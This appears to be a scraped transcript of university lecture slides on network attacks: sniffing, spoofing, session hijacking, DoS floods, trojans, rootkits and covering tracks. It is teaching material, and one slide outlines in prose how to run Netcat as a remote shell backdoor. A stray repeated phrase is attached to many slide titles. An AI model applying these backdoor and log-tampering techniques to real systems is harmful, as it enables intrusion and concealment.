Kuliah iii threat and attack 2
Download
1 / 31

KULIAH III THREAT AND ATTACK (2) - PowerPoint PPT Presentation


  • 142 Views
  • Uploaded on

KULIAH III THREAT AND ATTACK (2). Aswin Suharsono. KOM 15008 Keamanan Jaringan 2012/2013. Overview. Phase 3: Gaining Access Using Network Attacks Sniffing IP Address Spoofing Session Hijacking Netcat DOS Phase 4: Maintain Access Trojan Backdoors Phase 5 Covering Tracks and Hiding.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about ' KULIAH III THREAT AND ATTACK (2)' - kele


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Kuliah iii threat and attack 2

KULIAH IIITHREAT AND ATTACK (2)

Aswin Suharsono

KOM 15008

KeamananJaringan

2012/2013


Overview
Overview

  • Phase 3: Gaining Access Using Network Attacks

    • Sniffing

    • IP Address Spoofing

    • Session Hijacking

    • Netcat

    • DOS

  • Phase 4: Maintain Access

    • Trojan

    • Backdoors

  • Phase 5 Covering Tracks and Hiding


Sniffer
Sniffer

  • Allows attacker to see everything sent across the network, including userIDs and passwords

  • NIC placed in promiscuous mode

  • Tcpdump http://www.tcpdump.org

  • Windump http://netgroup-serv.polito.it/windump

  • Snort http://www.snort.org

  • Ethereal http://www.ethereal.com

  • Sniffit http://reptile.rug.ac.be/~coder/sniffit/sniffit.html

  • Dsniff http://www.monkey.org/~dugsong/dsniff


Passive sniffers
Passive Sniffers

  • Sniffers that passively wait for traffic to be sent to them

  • Well suited for hub environment

  • Snort

  • Sniffit



Bad guys can sniff packets
Bad guys can sniff packets

packet “sniffing”:

broadcast media (shared ethernet, wireless)

promiscuous network interface reads/records all packets (e.g., including passwords!) passing by

src:B dest:A payload

C

A

B

  • wireshark software used for end-of-chapter labs is a (free) packet-sniffer

Introduction


Bad guys can use fake addresses
Bad guys can use fake addresses

IP spoofing:send packet with false source address

src:B dest:A payload

C

A

B

… lots more on security (throughout, Chapter 8)

Introduction




Ip address spoofing
IP Address Spoofing

  • Changing or disguising the source IP address

  • used by Nmap in decoy mode

  • Used by Dsniff in dnsspoof attack

    • DNS response sent by Dsniff contains source address of the DNS server

  • Used in denial-of-service attacks

  • Used in undermining Unix r-commands

  • Used with source routing attacks


Simple ip address spoofing
Simple IP Address Spoofing

  • Pros

    • Works well in hiding source of a packet flood or other denial-of-service attack

  • Cons

    • Difficult for attacker to monitor response packets

    • Any response packet will be sent to spoofed IP address

    • Difficult to IP address spoof against any TCP-based service unless machines are on same LAN and ARP spoof is used





Session hijacking
Session Hijacking main management system

  • Session Hijacking, Perpaduan antara Sniffing dan Spoofing

  • Pengertian Session

  • Sniff for session

  • Rekam

  • Gunakan untuk masuk

  • Dengan mencuri Session milik orang lain, maka bisa masuk tanpa perlu login


Denial of Service (DoS): main management system attackers make resources (server, bandwidth) unavailable to legitimate traffic by overwhelming resource with bogus traffic

target

Bad guys: attack server, network infrastructure

1. select target

2. break into hosts around the network (see botnet)

3. send packets to target from compromised hosts

Introduction


Syn flood
SYN Flood main management system

  • Attacker sends continuous stream of SYN packets to target

  • Target allocates memory on its connection queue to keep track of half-open connections

  • Attacker does not complete 3-way handshake, filling up all slots on connection queue of target machine

  • If target machine has a very large connection queue, attacker can alternatively send sufficient amount of SYN packets to consume target machine’s entire network bandwidth


Smurf attacks
Smurf Attacks main management system

  • Aka directed broadcast attacks

  • Smurf attacks rely on an ICMP directed broadcast to create a flood of traffic on a victim

  • Attacker uses a spoofed source address of victim

  • Smurf attack is a DOS that consumes network bandwidth of victim

  • Smurf amplifier is a network that responds to directed broadcast messages


4 maintaining access
4. Maintaining Access main management system


Trojan horses
Trojan Horses main management system

  • Software program containing a concealed malicious capability but appears to be benign, useful, or attractive to users


Backdoor
Backdoor main management system

  • Software that allows an attacker to access a machine using an alternative entry method

  • Installed by attackers after a machine has been compromised

  • May Permit attacker to access a computer without needing to provide account names and passwords

  • Used in movie “War Games”

  • Can be sshd listening to a port other than 22

  • Can be setup using Netcat


Netcat as a backdoor
Netcat as a Backdoor main management system

  • A popular backdoor tool

  • Netcat must be compiled with “GAPING_SECURITY_HOLE” option

  • On victim machine, run Netcat in listener mode with –e flag to execute a specific program such as a command shell

  • On attacker’s machine run Netcat in client mode to connect to backdoor on victim


Traditional rootkits
Traditional RootKits main management system

  • A suite of tools that allow an attacker to maintain root-level access via a backdoor and hiding evidence of a system compromise

  • More powerful than application-level Trojan horse backdoors(eg. BO2K, Netcat) since the latter run as separate programs which are easily detectable

  • a more insidious form of Trojan horse backdoor than application-level counterparts since existing critical system components are replaced to let attacker have backdoor access and hide


Kernel level rootkits
Kernel-Level RootKits main management system

  • More sinister, devious, and nasty than traditional RootKits

  • Operating system kernel replaced by a Trojan horse kernel that appears to be well-behaved but in actuality is rotten to the core

  • Critical system files such as ls, ps, du, ifconfig left unmodified

  • Trojanized kernel can intercept system calls and run another application chosen by atttacker

    • Execution request to run /bin/login is mapped to /bin/backdoorlogin

    • Tripwire only checks unaltered system files

  • If the kernel cannot be trusted, nothing on the system can be trusted


5 covering tracks
5. Covering Tracks main management system


Hiding evidence by altering event logs
Hiding Evidence by main management systemAltering Event Logs

  • Attackers like to remove evidence from logs associated with attacker’s gaining access, elevating privileges,and installing RootKits and backdoors

    • Login records

    • Stopped and restarted services

    • File access/update times


Covert channels
Covert Channels main management system

  • Communication channels that disguises data while it moves across the network to avoid detection

  • Require a client and server

  • Can be used to remotely control a machine and to secretly transfer files or applications


Figure 11 5 a covert channel between a client and a server
Figure 11.5 A covert channel main management systembetween a client and a server


Tunneling
Tunneling main management system

  • Carrying one protocol inside another protocol

    • Eg. Tunneling AppleTalk traffic over IP

  • Any communications protocol can be used to transmit another protocol

    • SSH protocol used to carry telnet, FTP, or X-Windows session

  • Used by covert channels

    • Loki

    • Reverse WWW Shell


Terima kasih

Terima Kasih main management system


ad